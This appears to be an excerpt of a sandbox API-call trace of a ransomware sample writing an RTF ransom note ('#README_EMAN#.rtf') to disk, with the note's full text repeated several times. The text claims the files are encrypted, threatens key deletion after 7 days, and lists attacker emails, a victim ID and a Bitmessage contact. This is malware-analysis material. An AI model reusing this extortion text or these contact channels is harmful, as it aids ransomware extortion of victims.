butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0267.743] WriteFile (in: hFile=0x2ec, lpBuffer=0x3963c28*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x3963c28*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0267.743] CloseHandle (hObject=0x2ec) returned 1 [0267.743] GetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\#readme_eman#.rtf")) returned 0xffffffff [0267.743] GetLastError () returned 0x2 [0267.743] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0267.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0267.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0267.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x3957a28, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s 